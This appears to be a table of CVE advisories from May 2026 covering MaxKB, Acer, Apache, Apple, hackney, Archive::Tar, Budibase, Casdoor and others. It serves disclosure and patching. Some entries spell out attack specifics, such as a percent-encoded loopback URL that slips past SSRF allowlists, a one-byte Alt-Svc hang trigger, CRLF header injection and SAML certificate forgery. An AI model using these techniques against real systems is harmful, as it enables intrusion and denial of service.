| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.1, SSRF via work_flow_template Import. Authenticated users can supply arbitrary URLs in work_flow_template.downloadUrl which are fetched server-side without any URL validation or internal IP filtering. This vulnerability is fixed in 2.9.1. | 2026-05-26 | not yet calculated | CVE-2026-45412 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-x9g5-j56j-4mfj |
| 1Panel-dev--MaxKB | MaxKB is an open-source AI assistant for enterprise. Prior to 2.9.1, user passwords are stored using unsalted MD5 hashes, making them trivially crackable via rainbow tables or GPU-accelerated brute force (hashcat). This vulnerability is fixed in 2.9.1. | 2026-05-26 | not yet calculated | CVE-2026-45413 | https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-2m4c-mcq5-q8xq |
| Acer--Care Center | A security vulnerability has been identified in Acer Care Center where the ACCSvc service creates a Named Pipe with a weak Security Descriptor. This vulnerability allows an authenticated local user to connect and send a specially crafted message (message type 0x03) to the pipe, causing the service to crash with exit code 1067 (ERROR_PROCESS_ABORTED). To mitigate this potential local service disruption, Acer requires users to update the software to the latest version. | 2026-05-25 | not yet calculated | CVE-2026-9490 | https://community.acer.com/en/kb/articles/19668 |
| Acer--NitrorSense V3 | NitroSense 3.x before 3.01.3052 contains Local Privilege Escalation (LPE) vulnerability.The program exposes a Windows Named Pipe that uses a custom protocol to invoke internal functions. However, this Named Pipe is misconfigured, allowing any authenticated local user to execute arbitrary code with NT AUTHORITY\SYSTEM privileges and to delete arbitrary files with SYSTEM privileges. By leveraging this, an attacker can execute arbitrary code on the target system with elevated privileges. | 2026-05-25 | not yet calculated | CVE-2026-9489 | https://community.acer.com/en/kb/articles/19652 |
| Acer--NitrorSense V3 | A Local Privilege Escalation (LPE) vulnerability affects Acer NitroSense software versions prior to 3.01.3052. The vulnerability stems from the the PSAdminAgent service, which creates a Named Pipe with a weak Access Control List (ACL). This allows any authenticated local user to connect and send commands. Because the service does not check the caller's privileges before running file deletion commands, a low-privileged local user can exploit this to delete arbitrary files with system authority. | 2026-05-28 | not yet calculated | CVE-2026-9789 | https://community.acer.com/en/kb/articles/19670 |
| Acer--Predator Connect W6x | Unauthenticated Debug Service. The /sbin/mtk_dut binary is exposed on TCP port 9000 without authentication, allowing any LAN-based attacker to execute arbitrary UCC commands. | 2026-05-29 | not yet calculated | CVE-2026-49195 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | The Wi-Fi device blocking feature fails to sanitize MAC address input, allowing injection and execution of arbitrary shell commands. | 2026-05-29 | not yet calculated | CVE-2026-49196 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Web endpoints intended for the Acer Connect app improperly validate the HTTP Authorization header, failing to block requests when Base64 decoding fails. | 2026-05-29 | not yet calculated | CVE-2026-49197 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Improper access control in the MQTT broker allows wildcard topic subscriptions, exposing all MQTT traffic to unauthorized actors. | 2026-05-29 | not yet calculated | CVE-2026-49198 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Predator Connect W6x | Crafted MQTT messages can trigger command injection, resulting in root-level code execution on the target device. | 2026-05-29 | not yet calculated | CVE-2026-49199 | https://community.acer.com/en/kb/articles/19672 |
| Acer--Wave 7 router | The acer_cgi.log file in the device firmware is accessible without authentication via the web interface. This file contains cleartext login credentials (for web and Telnet), leading to unauthorized system access. | 2026-05-29 | not yet calculated | CVE-2026-49200 | https://community.acer.com/en/kb/articles/19673 |
| Acer--Wave 7 router | The upload.cgi binary, responsible for processing device backups, contains a hardcoded AES encryption key. This allows an attacker to decrypt, modify, and re-encrypt system backups, facilitating persistent backdoor injection. | 2026-05-29 | not yet calculated | CVE-2026-49201 | https://community.acer.com/en/kb/articles/19673 |
| amir20--dozzle | Dozzle is a realtime log viewer for docker containers. Prior to 10.5.2, he WebSocket upgrader for the /exec and /attach endpoints uses CheckOrigin: func(r *http.Request) bool { return true }, accepting upgrade requests from any origin. Combined with the JWT cookie using SameSite: Lax, this enables Cross-Site WebSocket Hijacking (CSWSH). An attacker hosting a page on a same-site origin (e.g., a sibling subdomain, or another service on localhost) can initiate a WebSocket connection to the exec endpoint that carries the victim's valid JWT cookie, gaining interactive shell access in any container the victim is authorized to access. This vulnerability is fixed in 10.5.2. | 2026-05-26 | not yet calculated | CVE-2026-44985 | https://github.com/amir20/dozzle/security/advisories/GHSA-j643-x8pv-8m67 https://github.com/amir20/dozzle/releases/tag/v10.5.2 |
| Apache Software Foundation--Apache Airflow FAB provider | Apache Airflow FAB Auth Manager contains an LDAP filter injection vulnerability (CWE-90) that allows unauthenticated attackers to exfiltrate directory data or bypass authentication. Upgrade to apache-airflow-providers-fab 3.6.4 or later. If immediate upgrade is not possible, disable LDAP authentication until the provider can be updated. | 2026-05-25 | not yet calculated | CVE-2026-46745 | https://github.com/apache/airflow/pull/66417 https://lists.apache.org/thread/dvfy0bs181xwsrjrd3y5c55ztbzm8yhh |
| Apache Software Foundation--Apache Airflow Google provider | Apache Airflow providers-google's `ComputeEngineSSHHook` disables SSH host-key verification by default, exposing SSH traffic between an Airflow worker and a Compute Engine VM to in-path network attackers who can intercept or modify the session. Users are advised to upgrade to `apache-airflow-providers-google` 22.0.0 or later. | 2026-05-25 | not yet calculated | CVE-2026-45361 | https://github.com/apache/airflow/pull/66746 https://lists.apache.org/thread/3lpj7ppwxp7jtp81rnxk75xvln7qd7h2 |
| Apache Software Foundation--Apache Artemis Stomp Protocol | A vulnerability exists in Apache Artemis whereby an application using the STOMP protocol with security credentials that grant either the consume or send permission on an address can augment the routing-type supported by that address even if said user doesn't have the createAddress permission for that particular address. A user could successfully send a message to an address or consume a message from a queue with a routing-type not supported by the corresponding address when that operation should actually be rejected on the basis that the user doesn't have permission to change the routing-type of the address. Even though the user was already granted permission to send and/or consume messages, they should not be able to augment the routing-type of the address without the createAddress permission. This issue affects Apache Artemis: from 2.50.0 through 2.53.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.54.0, which fixes the issue. | 2026-05-28 | not yet calculated | CVE-2026-40914 | https://lists.apache.org/thread/6q3st8dlorz2q05svqn11k1xl7jkmm4c |
| Apache Software Foundation--Apache ECharts | A cross-site scripting (XSS) vulnerability exists in Apache ECharts in the Lines series tooltip rendering logic. This issue affects Apache ECharts: from before 6.1.0. In versions prior to 6.1.0, if both Lines series and tooltip are used, and no user-specified tooltip.formatter is provided, and series.data[i].name is specified, raw HTML string series.data[i].name can be rendered through innerHTML sink into tooltip content. Although tooltip is allowed to accept user-provided raw HTML via a custom tooltip.formatter, the built-in tooltip formatters conventionally perform HTML escaping automatically. This case breaks that convention and may unexpectedly lead to script execution when tooltips are displayed. Users are recommended to upgrade to version 6.1.0 if using the Lines series in this way, which fixes the issue. | 2026-05-25 | not yet calculated | CVE-2026-45249 | https://github.com/apache/echarts/pull/21608 https://echarts.apache.org/en/option.html#series-lines https://echarts.apache.org/handbook/en/best-practices/security/#passing_raw_html_safely https://lists.apache.org/thread/1g6xk7gd9vg1c6zyqqt2lnko10zomc3o |
| Apache Software Foundation--Apache Flink Kubernetes Operator | Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator. The FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses. This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0. Users are recommended to upgrade to version 1.15.0, which fixes the issue. | 2026-05-26 | not yet calculated | CVE-2026-40564 | https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz |
| Apache Software Foundation--Apache Ignite | Relative Path Traversal vulnerability in Apache Ignite REST API. Authenticated REST API users can read any file on the server with "cmd=log" command and a log path crafted in a certain way. This issue affects Apache Ignite: from 2.0.0 through 2.17.0. Users are recommended to upgrade to version 2.18.0, which fixes the issue. | 2026-05-28 | not yet calculated | CVE-2025-48977 | https://lists.apache.org/thread/hgct6918sowd8l58yjohryhpxx81t4n1 |
| Apache Software Foundation--Apache Shiro | Default configurations of Apache Shiro have a session fixation vulnerability. This issue affects Apache Shiro from 1.0 to 2.1.0, and 3.0.0-alpha-1. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue. In the affected versions, when a session already exists, it is not invalidated upon successful login, nor is a new session being generated with a new ID. | 2026-05-25 | not yet calculated | CVE-2026-43827 | https://shiro.apache.org/security-reports.html#cve_2026_43827 |
| Apache Software Foundation--Apache Shiro | Default configurations of Apache Shiro send sensitive cookies in HTTPS session without 'Secure' attribute. This issue affects Apache Shiro from 1.0 to 2.1.0, and 3.0.0-alpha-1. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue. In the affected versions, Shiro-native session manager, as well as Remember-Me manager sends JSESSIONID and rememberMe cookies without 'secure' attribute by default. | 2026-05-25 | not yet calculated | CVE-2026-43828 | https://shiro.apache.org/security-reports.html#cve_2026_43828 |
| Apache Software Foundation--Apache Shiro | Apache Shiro's Jakarta EE module used the HTTP Referer header in certain cases to issue redirect after a user login. In affected versions, insufficient validation of this client-controlled value could allow an attacker to influence the redirect target in applications using the Jakarta EE module. This issue affects Apache Shiro from 2.0-alpha to 2.2.0, and 3.0.0-alpha-1, only when using shiro-jakarta-ee integration module. | 2026-05-25 | not yet calculated | CVE-2026-48589 | https://shiro.apache.org/security-reports.html#cve_2026_48589 |
| Apache Software Foundation--Apache Shiro Jakarta EE module | With valid login credentials, URL Redirection to Untrusted Site ('Open Redirect'), Server-Side Request Forgery (SSRF) vulnerability in Apache Shiro. This issue affects Apache Shiro from 2.0-alpha to 2.1.0, and 3.0.0-alpha-1, only when using shiro-jakarta-ee integration module. Users are recommended to upgrade to version 2.1.1, or 3.0.0-alpha-2 or later, which fixes the issue by encrypting the cookie. After successful login, Jakarta EE integration module uses shiroSavedRequest cookie to redirect to a particular web page after login. This cookie was not validated, and can be forged to send a HTTP GET request from the server itself to an arbitrary URL from the cookie. | 2026-05-25 | not yet calculated | CVE-2026-44598 | https://shiro.apache.org/security-reports.html#cve_2026_44598 |
| Apache Software Foundation--Apache Syncope | Improper Isolation or Compartmentalization vulnerability in Apache Syncope. An administrator with adequate entitlements for Implementations can create a malicious Groovy class containing untrusted code reaching a non-sandboxed execution path via the class static initializer. This issue affects Apache Syncope: 3.0 through 3.0.16, 4.0 through 4.0.5, 4.1.0. Users are recommended to upgrade to version 4.0.6 / 4.1.1, which fix this issue by forcing even the static initializer in Groovy code to run in a sandbox. | 2026-05-25 | not yet calculated | CVE-2026-42782 | https://lists.apache.org/thread/b869ms0ofrd129f7tgsn9flxgv9ztg2r |
| Apache Software Foundation--Apache Syncope | Exposure of Sensitive Information Through Data Queries vulnerability in Apache Syncope. An administrator with adequate entitlements for Derived Schemas can create a malicious JEXL expression which allows any administrator with sufficient entitlements for User read to access User-related security-sensitive information. This issue affects Apache Syncope: 3.0 through 3.0.16, 4.0 through 4.0.5, 4.1.0. Users are recommended to upgrade to version 4.0.6 / 4.1.1, which fix this issue by further restricting the JEXL expression definition. | 2026-05-25 | not yet calculated | CVE-2026-42797 | https://lists.apache.org/thread/5y7d277sntyytrmxnx2tfjr9ftcpq1s6 |
| Apple--macOS | A logic issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. A malicious app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-43289 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. An app may be able to modify protected parts of the file system. | 2026-05-26 | not yet calculated | CVE-2025-43290 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A logic issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7, macOS Sonoma 14.8, macOS Tahoe 26. A malicious app may be able to gain root privileges. | 2026-05-26 | not yet calculated | CVE-2025-43306 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 https://support.apple.com/en-us/125112 |
| Apple--macOS | A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26. An app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-43451 | https://support.apple.com/en-us/125110 |
| Apple--macOS | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Tahoe 26. An app may be able to cause unexpected system termination. | 2026-05-26 | not yet calculated | CVE-2025-46280 | https://support.apple.com/en-us/125110 |
| Apple--macOS | A race condition was addressed with additional validation. This issue is fixed in macOS Sequoia 15.7, macOS Tahoe 26. An app may be able to gain root privileges. | 2026-05-26 | not yet calculated | CVE-2025-46284 | https://support.apple.com/en-us/125110 https://support.apple.com/en-us/125111 |
| Apple--macOS | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Tahoe 26. An app may be able to access sensitive user data. | 2026-05-26 | not yet calculated | CVE-2025-46307 | https://support.apple.com/en-us/125110 |
| AppLockZ--App Lock and Fingerprint Lock | AppLockZ App Lock and Fingerprint Lock (applock.passwordfingerprint.applockz) 4.2.11 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows - insecure navigation through exposed routes facilitates app control evasion {I.N.T.E.R.F.A.C.E] via advertisement or browser intents, an attacker can evade lockscreen verification and access protected apps (e.g., Chrome). This results in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68711 | https://play.google.com/store/apps/details?id=applock.passwordfingerprint.applockz https://github.com/actuator/applock.passwordfingerprint.applockz https://github.com/actuator/applock.passwordfingerprint.applockz/blob/main/CVE-2025-68711 |
| ASUS--Armoury Crate | Incorrect permission assignment for a critical resource in Armoury Crate allows a local user to bypass the driver's validation mechanism, resulting in unauthorized read and write access to physical memory.Refer to the ' Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information. | 2026-05-29 | not yet calculated | CVE-2026-8070 | https://www.asus.com/security-advisory |
| ASUS--ASUS System Control Interface | An Incorrect Permission Assignment for Critical Resource vulnerability in ASUS System Control Interface allows a local user to elevate privileges to SYSTEM and execute arbitrary code via a crafted RPC call that bypass the validation mechanism. Refer to the 'Security Update for ASUS System Control Interface' section on the ASUS Security Advisory for more information. | 2026-05-29 | not yet calculated | CVE-2026-7480 | https://www.asus.com/security-advisory/ |
| BackdropCMS--GDPR cookies module for Backdrop CMS | The GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration. | 2026-05-26 | not yet calculated | CVE-2025-71310 | https://backdropcms.org/security/sa-contrib-2025-013 |
| benoitc--hackney | Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in benoitc hackney allows Excessive Allocation. The Alt-Svc response header parser in src/hackney_altsvc.erl does not guarantee forward progress. When parse_token/2 receives a non-token, non-whitespace, non-comma byte (e.g. !, @, =, ;), it returns the input unchanged. skip_comma/1 also returns the buffer unchanged when the first byte is not a comma. parse_entries/2 then recurses with identical data, creating a tight infinite tail-recursive loop that pins a scheduler at 100% CPU. The calling process never returns. The entry point parse_and_cache/3 is called synchronously in the connection process on every HTTP response. A single-byte Alt-Svc: ! response header is sufficient to trigger the hang; the header is fully controlled by any HTTP origin the client connects to. This issue affects hackney: from 2.0.0-beta.1 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47066 | https://github.com/benoitc/hackney/security/advisories/GHSA-6cp8-v795-jr2j https://cna.erlef.org/cves/CVE-2026-47066.html https://osv.dev/vulnerability/EEF-CVE-2026-47066 https://github.com/benoitc/hackney/commit/e548aba1f97ffa3f4750da7b772998fb78c01894 |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. The URL parser in src/hackney_url.erl converts every unrecognized URL scheme to a permanent BEAM atom via binary_to_atom/2. BEAM atoms are never garbage-collected and the atom table defaults to a hard limit of 1,048,576 entries. An attacker who can supply URLs with attacker-chosen scheme prefixes - directly as request targets, as configured webhook URLs, or via Location headers followed during redirects - can exhaust the atom table and crash the entire BEAM VM with system_limit. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47067 | https://github.com/benoitc/hackney/security/advisories/GHSA-9653-rcfr-5c62 https://cna.erlef.org/cves/CVE-2026-47067.html https://osv.dev/vulnerability/EEF-CVE-2026-47067 https://github.com/benoitc/hackney/commit/31f6f0e27e096ad88743dfded4f030a3ee74972e |
| benoitc--hackney | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in benoitc hackney allows HTTP Response Splitting. The hackney_cookie:setcookie/3 function in src/hackney_cookie.erl validates the Name and Value arguments against CRLF and control characters, but concatenates the domain and path options verbatim into the output iolist with no equivalent check. An attacker who controls either option - for example by supplying a Host header value forwarded as the cookie domain, or a request path forwarded as the cookie path - can inject a literal CRLF sequence and arbitrary additional Set-Cookie headers into the HTTP response. This issue affects hackney: from 0.9.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47069 | https://github.com/benoitc/hackney/security/advisories/GHSA-mp55-p8c9-rfw2 https://cna.erlef.org/cves/CVE-2026-47069.html https://osv.dev/vulnerability/EEF-CVE-2026-47069 https://github.com/benoitc/hackney/commit/8e02b99c28aea1b3fa2ddc0e66f51fe5bb0ac540 |
| benoitc--hackney | Sensitive Data Exposure vulnerability in benoitc hackney allows Retrieve Embedded Sensitive Data. The HTTP/3 redirect handler in src/hackney_h3.erl passes the original request headers unchanged to the redirect target without performing any cross-origin check. When a client issues an HTTP/3 request with follow_redirect enabled and includes Authorization or Cookie headers, a server responding with a 3xx redirect to a different host will cause the client to forward those credentials verbatim to the new origin. The main hackney.erl module has maybe_strip_auth_on_redirect/2 (guarded by the location_trusted option) to address CVE-2018-1000007, but hackney_h3.erl is missing this protection entirely. This issue affects hackney: from 3.1.1 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47070 | https://github.com/benoitc/hackney/security/advisories/GHSA-h73q-4w9q-82h4 https://cna.erlef.org/cves/CVE-2026-47070.html https://osv.dev/vulnerability/EEF-CVE-2026-47070 https://github.com/benoitc/hackney/commit/c58d5b50bade146360b85caf3dc8065807b08246 |
| benoitc--hackney | Uncontrolled Resource Consumption vulnerability in benoitc hackney allows Flooding. The SOCKS5 transport in src/hackney_socks5.erl correctly applies the caller-supplied timeout to the SOCKS5 negotiation phase, but then upgrades the connection to TLS using the two-argument form ssl:connect/2, which defaults to an infinite timeout. The Timeout value is in scope at the call site but is not forwarded. A hostile SOCKS5 proxy that completes the SOCKS5 handshake normally and then goes silent (or sends a partial TLS ServerHello and stalls) will cause the connecting process to block indefinitely, regardless of the connect_timeout or recv_timeout options supplied by the caller. This issue affects hackney: from 0.10.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47071 | https://github.com/benoitc/hackney/security/advisories/GHSA-gp9c-pm5m-5cxr https://cna.erlef.org/cves/CVE-2026-47071.html https://osv.dev/vulnerability/EEF-CVE-2026-47071 https://github.com/benoitc/hackney/commit/5ccdab725c561a6f03d05a51f2d0664f98236dae |
| benoitc--hackney | Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in benoitc hackney allows HTTP Request/Response Splitting. The WebSocket upgrade code in src/hackney_ws.erl copies the host, path, headers (ExtraHeaders), and protocols options from the caller-supplied opts map into the internal #ws_data{} record in init/1 and then splices them verbatim into the raw HTTP/1.1 upgrade request by binary concatenation in do_handshake/1. No CRLF or NUL stripping is performed at any of these four injection sites. An attacker who controls any of these options - for example by forwarding URL components or header values from untrusted input into hackney_ws:start_link/1 - can inject arbitrary HTTP headers into the outbound WebSocket upgrade request, leading to header injection, credential spoofing toward the upstream server, log and cache poisoning, or request smuggling via intermediary proxies. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47072 | https://github.com/benoitc/hackney/security/advisories/GHSA-f9vr-g2g2-x9fg https://cna.erlef.org/cves/CVE-2026-47072.html https://osv.dev/vulnerability/EEF-CVE-2026-47072 https://github.com/benoitc/hackney/commit/52310ca807e7b48441ba0e9129171f535313fdd1 |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. The WebSocket client in src/hackney_ws.erl imposes no upper bound on memory consumption in three code paths. First, read_handshake_response/3 accumulates received bytes into a growing buffer with no size cap; the per-receive timeout resets on every chunk, so a server that streams bytes without ever sending \r\n\r\n causes the buffer to grow until memory is exhausted. Second, parse_payload/9 and parse_active_payload/8 do not validate the declared frame payload length against any limit; because RFC 6455 allows payload lengths up to 2^63-1 bytes, a server that announces a very large frame and dribbles bytes causes the accumulation buffer to grow until OOM. Third, the frag_buffer field in #ws_data{} accumulates continuation frames indefinitely; a server that sends an endless stream of non-final (nofin) fragmented frames without ever sending a final (fin) frame grows frag_buffer without bound. In all three cases the attacker only needs to control the WebSocket server the hackney client connects to, with no authentication or special client configuration required. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47073 | https://github.com/benoitc/hackney/security/advisories/GHSA-q8jg-fgj4-fphf https://cna.erlef.org/cves/CVE-2026-47073.html https://osv.dev/vulnerability/EEF-CVE-2026-47073 https://github.com/benoitc/hackney/commit/ce0109e2970ace6e20ff29bae9d05c3ac22ec6dc |
| benoitc--hackney | Improper Neutralization of CRLF Sequences vulnerability in benoitc hackney allows HTTP Request Splitting. hackney does not percent-encode carriage return (\r) or line feed (\n) characters in the URL query component before constructing the HTTP/1.1 request target. Characters outside the grammar defined in RFC 3986 Section 3.4 must be percent-encoded, but hackney_url:make_url/3 passes the query binary directly without validation or escaping. An attacker who can control all or part of a URL passed to hackney can inject raw CRLF sequences into the query string, which are then sent as HTTP line breaks in the request target. This enables injection of arbitrary HTTP headers or splitting of the HTTP request. This issue affects hackney: from 0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47075 | https://github.com/benoitc/hackney/security/advisories/GHSA-j9wq-vxxc-94wf https://cna.erlef.org/cves/CVE-2026-47075.html https://osv.dev/vulnerability/EEF-CVE-2026-47075 https://github.com/benoitc/hackney/commit/ca73dd0aba0ed557449c18288bf07241671a43c9 |
| benoitc--hackney | Interpretation Conflict vulnerability in benoitc hackney allows Server Side Request Forgery. hackney_url:normalize/2 URL-decodes the host component after the URL has been parsed into a #hackney_url{} record. OTP's uri_string:parse/1 and inet:parse_address/1 do not decode percent-escapes in the host, so a URL such as http://%31%32%37%2E%30%2E%30%2E%31/ is seen by a caller's allowlist validator with host %31%32%37%2E%30%2E%30%2E%31 (not an IP address), which passes the allowlist check. hackney's normalizer then decodes the host to 127.0.0.1 and opens a TCP connection to loopback. Because hackney:request/5 always calls hackney_url:normalize/2 with no opt-out, every request that takes a binary or list URL is affected. The same technique reaches cloud instance metadata services (169.254.169.254), RFC1918 networks, and any admin interface listening on localhost. This issue affects hackney: from 0.13.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47076 | https://github.com/benoitc/hackney/security/advisories/GHSA-pj7v-xfvx-wmjq https://cna.erlef.org/cves/CVE-2026-47076.html https://osv.dev/vulnerability/EEF-CVE-2026-47076 https://github.com/benoitc/hackney/commit/452620a92ec1da2e6b4862a049a2a4f04b42068f |
| benoitc--hackney | Allocation of Resources Without Limits or Throttling vulnerability in benoitc hackney allows Flooding. hackney_h3:await_response_loop/6 accumulates the HTTP/3 response body in memory without any size cap. The after Timeout clause is a per-message inactivity timer that resets on every received chunk, housekeeping message, or settings frame - it is not a wall-clock deadline. A malicious HTTP/3 server that emits one small chunk every Timeout - 1 ms with Fin = false and never sends a final frame keeps the loop alive indefinitely while the accumulation buffer grows linearly without bound, eventually exhausting the BEAM process heap and causing an out-of-memory condition. This issue affects hackney: from 2.0.0 before 4.0.1. | 2026-05-25 | not yet calculated | CVE-2026-47077 | https://github.com/benoitc/hackney/security/advisories/GHSA-jq4m-q6p2-8gwc https://cna.erlef.org/cves/CVE-2026-47077.html https://osv.dev/vulnerability/EEF-CVE-2026-47077 https://github.com/benoitc/hackney/commit/3d25f9fea26c90609de9d64366fedfe5065413bc |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.08 for Perl extract symlinks with attacker controlled targets outside the extraction directory. _make_special_file() passes the tar header's linkname to symlink() without validating it against absolute paths or .. segments. The secure-extract mode check that guards regular file extraction does not cover the symlink target. A subsequent open through the extracted name reads or writes the attacker chosen path. | 2026-05-26 | not yet calculated | CVE-2026-42496 | https://github.com/jib/archive-tar-new/commit/17c873492a05eddc0de18c1485e0b2cccd5a9158.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.08/changes https://www.cve.org/CVERecord?id=CVE-2026-42497 |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.08 for Perl extract hardlinks to attacker controlled paths outside the extraction directory. _make_special_file() passes the tar header's linkname to link() without validating it against absolute paths or .. segments, creating a hardlink that shares the victim file's inode. A subsequent write through the extracted name modifies the victim file, and the post-extraction chmod, chown, and utime block in _extract_file() (guarded only against symlinks via -l) applies the tar header's mode, owner, and timestamps to the shared inode during extraction alone. | 2026-05-26 | not yet calculated | CVE-2026-42497 | https://github.com/jib/archive-tar-new/commit/17c873492a05eddc0de18c1485e0b2cccd5a9158.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.08/changes https://www.cve.org/CVERecord?id=CVE-2026-42496 |
| BINGOS--Archive::Tar | Archive::Tar versions before 3.10 for Perl allow memory exhaustion via attacker controlled entry size field in tar header. _read_tar() reads each entry's payload with $handle->read($$data, $block), where $block is derived from the entry's 12-byte size field in the tar header with no upper bound on that value. A crafted header declaring a multi-gigabyte size causes Perl to allocate a scalar of that size. | 2026-05-26 | not yet calculated | CVE-2026-9538 | https://github.com/jib/archive-tar-new/commit/f9af01426038e29d9578825a0cd3626946ab08c7.patch https://metacpan.org/release/BINGOS/Archive-Tar-3.10/changes |
| Bolt--Bolt CMS | Bolt CMS through 3.7.0 allows SQL Injection in the 'order' parameter of the content listing pages. An authenticated attacker with low-level privileges can exploit this through the OrderDirective component. This allows for the extraction of sensitive information | 2026-05-29 | not yet calculated | CVE-2026-39229 | https://github.com/bolt/bolt https://boltcms.io/ https://github.com/Tonoss-412/My-CVE/blob/main/CVE-2026-39229.md |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.39.0, the executeQuery automation step in Budibase accepts a queryId from automation step inputs and passes it directly to the query execution controller without additional validation. When combined with a REST datasource configured to target internal infrastructure, this creates a server-side request forgery path where automation execution causes the Budibase server to make outbound HTTP requests to attacker-influenced destinations. The automation output then returns the response, potentially exposing internal service data. This vulnerability is fixed in 3.39.0. | 2026-05-27 | not yet calculated | CVE-2026-48128 | https://github.com/Budibase/budibase/security/advisories/GHSA-6964-pp88-6wp9 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.3, the VectorDB configuration endpoint in Budibase accepts a host parameter that undergoes no validation against internal IP ranges, reserved hostnames, or URL schemes. Any authenticated user with builder-level access can supply an arbitrary host value such as 169.254.169.254 or localhost, causing the server to initiate outbound TCP connections to internal network addresses or cloud metadata endpoints on their behalf.This vulnerability is fixed in 3.35.3. | 2026-05-27 | not yet calculated | CVE-2026-48148 | https://github.com/Budibase/budibase/security/advisories/GHSA-cv96-5348-p5p8 |
| bzip2--bzip2 | bzip2 contains an off‑by‑one error in the bzip2recover utility. When processing a specially crafted file, the application performs an out‑of‑bounds write to a global buffer, resulting in memory corruption and a crash (denial of service). This issue was fixed in bzip2 patch 35d122a3df8b0cc4082a4d89fdc6ee99f375fe67 | 2026-05-28 | not yet calculated | CVE-2026-42250 | https://cert.pl/en/posts/2026/05/CVE-2026-42250/ https://sourceware.org/bzip2/ https://inbox.sourceware.org/bzip2-devel/20260528145407.293768-1-mark@klomp.org/ https://sourceware.org/cgit/bzip2/commit/?id=35d122a3df8b0cc4082a4d89fdc6ee99f375fe67 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability that allows an attacker to bypass authentication by supplying an arbitrary signing certificate. The buildSpCertificateStore function extracts the X.509 certificate directly from the incoming SAMLResponse instead of using the trusted pre-configured Identity Provider certificate, allowing an attacker to forge assertions signed with an attacker-controlled key. | 2026-05-28 | not yet calculated | CVE-2026-9090 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a logic flaw in the social‑login binding flow that allows users to bypass configured MFA requirements. The binding‑rule code path in controllers/auth.go calls HandleLoggedIn directly without invoking checkMfaEnable. Any user authenticating via this path is logged in without MFA enforcement. | 2026-05-28 | not yet calculated | CVE-2026-9091 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability involving unverified email binding that may enable account takeover. The getExistUserByBindingRule function matches users by email without checking the email_verified claim from upstream providers; the idp.UserInfo struct does not even include a EmailVerified field. An attacker can supply an unverified email claim from an upstream provider to take over accounts that use the same email address. | 2026-05-28 | not yet calculated | CVE-2026-9092 | https://kb.cert.org/vuls/id/780781 |
